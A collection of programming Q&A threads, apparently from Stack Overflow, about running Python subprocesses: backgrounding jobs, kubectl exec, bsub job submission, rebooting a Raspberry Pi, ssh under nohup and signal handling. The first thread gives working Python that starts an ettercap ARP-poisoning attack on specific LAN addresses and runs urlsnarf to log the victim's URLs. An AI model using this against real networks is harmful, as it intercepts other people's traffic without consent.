Run console application in background - python

I am working on a Python script where I first set ettercap to ARP poisoning and then start urlsnarf to log the URLs. I want ettercap to start first and then, while it is poisoning, start urlsnarf. The problem is that both jobs must run at the same time, with urlsnarf showing its output. So I thought it would be nice if I could run ettercap in the background, without waiting for it to exit, and then run urlsnarf. I tried the nohup command, but at the point where urlsnarf should have shown the URLs the script just ended. I run:
subprocess.call(["ettercap",
"-M ARP /192.168.1.254/ /192.168.1.66/ -p -T -q -i wlan0"])
But I get:
ettercap NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA
MITM method ' ARP /192.168.1.254/ /192.168.1.66/ -p -T -q -i wlan0' not supported...
This means that the arguments were somehow not passed correctly.

You could use the subprocess module in the Python standard library to spawn ettercap as a separate process that runs simultaneously with the parent. Using the Popen class from subprocess you can spawn your ettercap process, run your other processing, and then kill the ettercap process when you are done. More info here: Python Subprocess Package
import shlex, subprocess
args = shlex.split("ettercap -M ARP /192.168.1.254/ /192.168.1.66/ -p -T -q -i wlan0")
ettercap = subprocess.Popen(args)
# program continues without waiting for ettercap process to finish.
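Putting that together, here is a minimal sketch of the full flow; the urlsnarf invocation and its flags are an assumption, so adjust them to your interface and setup:

import shlex, subprocess

# Start ettercap in the background; Popen returns immediately.
ettercap = subprocess.Popen(shlex.split(
    "ettercap -M ARP /192.168.1.254/ /192.168.1.66/ -p -T -q -i wlan0"))

try:
    # Run urlsnarf in the foreground while ettercap keeps poisoning.
    # This call blocks until urlsnarf exits (for example on Ctrl-C).
    subprocess.call(shlex.split("urlsnarf -i wlan0"))
finally:
    # Stop the background ettercap process when we are done.
    ettercap.terminate()
    ettercap.wait()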

Related

Running background process with kubectl exec

I am trying to execute a Python program as a background process inside a container with kubectl as below (kubectl issued on local machine):
kubectl exec -it <container_id> -- bash -c "cd some-dir && (python xxx.py --arg1 abc &)"
When I log in to the container and check ps -ef I do not see this process running. Also, there is no output from the kubectl command itself.
Is the kubectl command issued correctly?
Is there a better way to achieve the same thing?
How can I see the output/logs printed by the background process?
If I need to stop this background process after some duration, what is the best way to do this?
The nohup Wikipedia page can help; you need to redirect all three IO streams (stdout, stdin and stderr) - an example with yes:
kubectl exec pod -- bash -c "yes > /dev/null 2> /dev/null &"
nohup is not required in the above case because I did not allocate a pseudo terminal (no -t flag) and the shell was not interactive (no -i flag) so no HUP signal is sent to the yes process on session termination. See this answer for more details.
Redirecting stdin from /dev/null is not required in the above case since stdin already refers to /dev/null (you can see this by running ls -l /proc/YES_PID/fd in another shell).
To see the output you can instead redirect stdout to a file.
To stop the process you'd need to identify the PID of the process you want to stop (pgrep could be useful for this purpose) and send a fatal signal to it (kill PID for example).
If you want to stop the process after a fixed duration, timeout might be a better option.
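If you are driving this from a script anyway, here is a sketch of the whole lifecycle using Python's subprocess to call kubectl; the pod name, log path and timeout value are assumptions, not values from the question:

import subprocess

pod = "mypod"  # hypothetical pod name

def kexec(cmd):
    # Run a shell command inside the container via kubectl exec.
    return subprocess.run(["kubectl", "exec", pod, "--", "bash", "-c", cmd],
                          capture_output=True, text=True)

# Start the job in the background, capped at one hour, logging to a file.
kexec("cd some-dir && timeout 3600 python xxx.py --arg1 abc > /tmp/xxx.log 2>&1 &")

# Later: inspect the log, and stop the process early if needed.
print(kexec("cat /tmp/xxx.log").stdout)
kexec("pkill -f 'python xxx.py'")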
Actually, the best way to do this kind of thing is to add an entrypoint to your container and execute the commands there.
Like:
entrypoint.sh:
#!/bin/bash
set -e
cd some-dir && (python xxx.py --arg1 abc &)
./somethingelse.sh
exec "$@"
That way you don't need to go into every single container manually and run the command.

using os.system for multiple line commands

I am trying to run shell code from a python file to submit another python file to a computing cluster. The shell code is as follows:
#BSUB -J Proc[1]
#BSUB -e ~/logs/proc.%I.%J.err
#BSUB -o ~/logs/proc.%I.%J.out
#BSUB -R "span[hosts=1]"
#BSUB -n 1
python main.py
But when I run it from python like the following I can't get it to work:
from os import system
system('bsub -n 1 < #BSUB -J Proc[1];#BSUB -e ~/logs/proc.%I.%J.err;#BSUB -o ~/logs/proc.%I.%J.out;#BSUB -R "span[hosts=1]";#BSUB -n 1;python main.py')
Is there something I'm doing wrong here?
If I understand correctly, all the #BSUB stuff is text that should be fed to the bsub command as input; bsub is run locally, then runs those commands for you on the compute node.
In that case, you can't just do:
bsub -n 1 < #BSUB -J Proc[1];#BSUB -e ~/logs/proc.%I.%J.err;#BSUB -o ~/logs/proc.%I.%J.out;#BSUB -R "span[hosts=1]";#BSUB -n 1;python main.py
That's interpreted by the shell as "run bsub -n 1 and read from a file named OH CRAP A COMMENT STARTED AND NOW WE DON'T HAVE A FILE TO READ!"
You could fix this with MOAR HACKERY (using echo or here strings, taking on further unnecessary dependencies on shell execution). But if you want to feed stdin input, the best solution is to use a more powerful tool for the task, the subprocess module:
import subprocess

# Open a process (no shell wrapper) that we can feed stdin to
proc = subprocess.Popen(['bsub', '-n', '1'], stdin=subprocess.PIPE)
# Feed the command series you needed to stdin, then wait for the process to complete
# Per Michael Closson, you can't use semicolons; bsub requires newlines
proc.communicate(b'''#BSUB -J Proc[1]
#BSUB -e ~/logs/proc.%I.%J.err
#BSUB -o ~/logs/proc.%I.%J.out
#BSUB -R "span[hosts=1]"
#BSUB -n 1
python main.py
''')
# Assuming the exit code is meaningful, check it here
if proc.returncode != 0:
    # Handle a failed process launch here
    raise RuntimeError("bsub exited with status %d" % proc.returncode)
This avoids a shell launch entirely (removing the issue with needing to deal with comment characters at all, along with all the other issues with handling shell metacharacters), and is significantly more explicit about what is being run locally (bsub -n 1) and what commands are being run in the bsub session (the stdin).
The #BSUB directives are parsed by the bsub binary, which doesn't support ; as a delimiter. You need to use newlines. This worked for me.
#!/usr/bin/python
import subprocess

# Open a process (no shell wrapper) that we can feed stdin to
proc = subprocess.Popen(['bsub', '-n', '1'], stdin=subprocess.PIPE)
# Feed the command series you needed to stdin, then wait for the process to complete
job_script = """#!/bin/sh
#BSUB -J mysleep
sleep 101
"""
proc.communicate(job_script)
So obviously I got the Python code from @ShadowRanger; +1 to his answer. I would have posted this as a comment on his answer if SO supported Python code in comments.

My Raspbian doesn't reboot via a Python application

I am desperately trying to find a way to force my Raspberry Pi running Raspbian to restart when a certain condition is met (in a Python script), but I have had no success so far...
I have tried the following statements using Popen:
sudo reboot -i -p
sudo reboot -f
sudo shutdown -r -f now
I thought the problem could be that I was calling it from the Python application itself, so I wrote a small C program to kill all running Python applications and then reboot, but still no success...
My Raspberry Pi is sufficiently powered (the red LED is always on), and all the commands above work fine when called directly from the command line.
Any help is appreciated!
Thanks,
EDITED:
Adding my Python script as requested:
from subprocess import Popen, PIPE

def reboot():
    echo.echo("Rebooting...")
    db.write_alarm(get_alarm_status())
    upload.upload_log()
    reboot_statement = "sudo shutdown -r -f now"
    popen_args = reboot_statement.split(" ")
    Popen(popen_args, stdout=PIPE, stderr=PIPE)
Try this:
create a file called reboot.py with the following contents:
import os
os.system("shutdown -r now")
then call it like this:
sudo python reboot.py
Assuming this works you can probably invoke your original script with sudo to get it to work.
You should pass shell=True if you want the shell to process the arguments:
Popen("sudo shutdown -r -f now", stdout=PIPE, stderr=PIPE, shell=True)
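If it still does nothing, here is a small debugging sketch (my suggestion, not from the answers above) that waits for the command and prints any error output, so a sudo password prompt or permission problem is not silently swallowed:

from subprocess import Popen, PIPE

def reboot():
    proc = Popen("sudo shutdown -r -f now", stdout=PIPE, stderr=PIPE, shell=True)
    out, err = proc.communicate()  # wait for the command to finish
    if proc.returncode != 0:
        # Surface the failure instead of discarding the piped stderr.
        print("shutdown failed: %s" % err)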

python subprocess output on nohup

Trying to monitor the available physical disk space of a remote machine using a Python script, which executes the df -h . command using subprocess.Popen.
import subprocess
import time

command = 'ssh remoteserver "df -h ."'

while True:
    proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, err = proc.communicate()
    print output
    print err
    time.sleep(60)
The script runs fine and prints the output to the terminal when run from command line
$> python2.7 script.py
Filesystem Size Used Avail Use% Mounted on
remoteserver:/home/user
555G 447G 109G 81% /home
The script does not produce any output and seems to block when it is started with the nohup command.
$> nohup python2.7 script.py &
I would like the script to work and fetch the disk space of the remote machine when started under nohup.
I'm not 100% sure of the underlying issue here, but when you invoke nohup in the shell, it disconnects some of the stdin/stdout from the terminal process, which I suspect is causing some of the interactions you're seeing.
Given that you're doing this from a remote machine, I'd actually recommend you look at using something like Fabric as a library to do what you're after. It's pretty straightforward, and does most of the handling of terminal sessions as well as closing things down nicely for you when you're complete.
something like:
from fabric import api
from fabric.api import env
import fabric
env.host_string = '%s@%s' % (username, remote_host)
env.disable_known_hosts = True
env.password = password
fabric.state.output['stdout'] = False
fabric.state.output['stderr'] = False
results = api.run('df -h')
You might try sending stdin=subprocess.PIPE to the subprocess command, then calling proc.stdin.close() on the next line, before the communicate() call. Or you can try changing the command to 'ssh remoteserver "df -h ." </dev/null'. Others report using FNULL = open(os.devnull, 'r') and passing in FNULL to the stdin= argument, but I'm not sure if you need to call FNULL.close() after or not.
SSH is most likely waiting for input for some reason when it is run from nohup. Perhaps it is unable to authenticate in the nohup environment and is asking for password input?
To make sure SSH is not waiting for input, try adding -o "BatchMode yes" to the ssh command and see if there are some clues in the output/error from the subprocess communicate call.
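Combining those suggestions, a minimal sketch of the loop with stdin pointed at /dev/null and BatchMode enabled; whether you need both is an assumption, so test against your setup:

import os
import subprocess
import time

command = 'ssh -o "BatchMode yes" remoteserver "df -h ."'

while True:
    # Give ssh a stdin of /dev/null so it can never block waiting for
    # terminal input (e.g. a password prompt) when running under nohup.
    with open(os.devnull, 'r') as devnull:
        proc = subprocess.Popen(command, shell=True, stdin=devnull,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        output, err = proc.communicate()
    print(output)
    print(err)
    time.sleep(60)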

Exit a Python process not kill it (via ssh)

I am starting my script locally via:
sudo python run.py remote
This script happens to also open a subprocess (if that matters)
webcam = subprocess.Popen('avconv -f video4linux2 -s 320x240 -r 20 -i /dev/video0 -an -metadata title="OfficeBot" -f flv rtmp://6f7528a4.fme.bambuser.com/b-fme/xxx', shell = True)
I want to know how to terminate this script when I SSH in.
I understand I can do:
sudo pkill -f "python run.py remote"
or use:
ps -f -C python
to find the process ID and kill it that way.
However, none of these kills the process gracefully. I want to be able to trigger the equivalent of Ctrl/Cmd-C to register an exit command (I do lots of things on shutdown that aren't triggered when the process is simply killed).
Thank you!
You should use "signals" for it:
http://docs.python.org/2/library/signal.html
Example:
import signal, os

def handler(signum, frame):
    print 'Signal handler called with signal', signum

signal.signal(signal.SIGINT, handler)
#do your stuff
then in terminal:
kill -INT $PID
or ctrl+c if your script is active in current shell
http://en.wikipedia.org/wiki/Unix_signal
also this might be useful:
How do you create a daemon in Python?
You can use signals to communicate with your process. If you want to emulate Ctrl-C, the signal is SIGINT (which you can raise with kill -INT and the process id). You can also modify the behavior for SIGTERM, which would make your program shut down cleanly under a broader range of circumstances.
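As a sketch of that idea (the cleanup steps are placeholders for whatever your run.py does on shutdown):

import signal
import sys

def shutdown(signum, frame):
    # Run the same cleanup you would on Ctrl-C, then exit.
    # e.g. webcam.terminate() and any other shutdown work (placeholders).
    sys.exit(0)

# Handle both Ctrl-C / kill -INT (SIGINT) and a plain kill PID (SIGTERM).
signal.signal(signal.SIGINT, shutdown)
signal.signal(signal.SIGTERM, shutdown)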
